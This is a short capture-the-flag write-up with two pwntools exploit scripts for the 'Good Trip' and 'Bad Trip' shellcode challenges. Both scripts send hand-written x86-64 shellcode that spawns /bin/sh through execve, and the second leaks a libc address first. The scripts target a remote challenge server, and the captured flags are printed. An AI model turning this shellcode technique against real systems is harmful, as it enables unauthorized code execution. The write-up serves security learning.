dplastico

Good Trip

A simple shellcode challenge

#!/usr/bin/python3
from pwn import *
gs = '''
continue
'''
elf = context.binary = ELF('./good_trip')
context.terminal = ['tmux', 'splitw', '-hp', '70']

def start():
    if args.GDB:
        return gdb.debug('./good_trip', gdbscript=gs)
    if args.REMOTE:
        return remote('172.210.129.230', 1351)
    else:
        return process('./good_trip')
r = start()
#========= exploit here ===================

payload = b"\x90"*0x7
payload += b"\x90" #b"\xcc"
payload += asm('''

    mov rsp, 0x404200
    mov rbp, 0x404200
    mov r11, 0x401090
    mov rsi, 0x100
    mov rdx, 0x7 
    call r11
    mov r10, 0x0068732f6e69622f
    mov [0x404100], r10
    mov rdi, 0x404100
    xor rsi, rsi
    xor rdx, rdx
    mov r9, 0x0000000000000959f
    mov r10, 0x1337131000
    xor [r10], r9
    mov rax, 0x3b
    mov rsp, 0x1337131000
    jmp rsp 
    ''')

payload += b"\xcc"*0x100
size = str(len(payload)).encode('ascii')
r.sendlineafter(b"code size >>", size)
r.sendlineafter(b"code >>", payload)

#======== interactive ====================
r.interactive()
#AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3}

Bad trip

A variation of the previous challenge, the difference was that we needed to leak a libc address to get a shell, at least that was how I solved it. The ARCH libc part was alittle bit confusing.

#!/usr/bin/python3
from pwn import *
gs = '''
continue
'''
elf = context.binary = ELF('./bad_trip')
context.terminal = ['tmux', 'splitw', '-h']
#context.log_level = 'debug'

def start():
    if args.GDB:
        return gdb.debug('./bad_trip', gdbscript=gs)
    if args.REMOTE:
        return remote('172.210.129.230', 1352)
    else:
        return process('./bad_trip')
r = start()

def format_byte_string(byte_string):
    result = 'b"' + ''.join(f'\\x{b:02x}' for b in byte_string) + '"'
    print(result)

#========= exploit here ===================

r.recvuntil(b"with ")
leak = int(r.recvline().strip(),16)
log.info(f"leak {hex(leak)}")
payload = b"\x90"*0x7
payload += b"\x90"

#execve() - puts()
#0x617e0 #0x6a220 #0x60e00
payload += asm(f'''
    mov rsp, 0x6969696000
    mov rbp, 0x6969696000
    mov r11, 0x0068732f6e69622f
    mov rdi, 0x6969696500
    mov [rdi], r11
    xor rsi, rsi
    xor rdx, rdx
    mov r10, fs:0x0
    mov eax, {hex(leak+0x60e00)}
    mov r11, 0xFFFFFFFF00000000
    and r10, r11
    or r10, rax
    mov [rsp], r10
    ret
''')

payload += b"\x90"*0x20

format_byte_string(payload)

r.sendlineafter(b">>", payload)
r.timeout = 1

#========= interactive ====================
r.interactive()
#AKASEC{pr3f37CH3M_Li8C_4Ddr35532}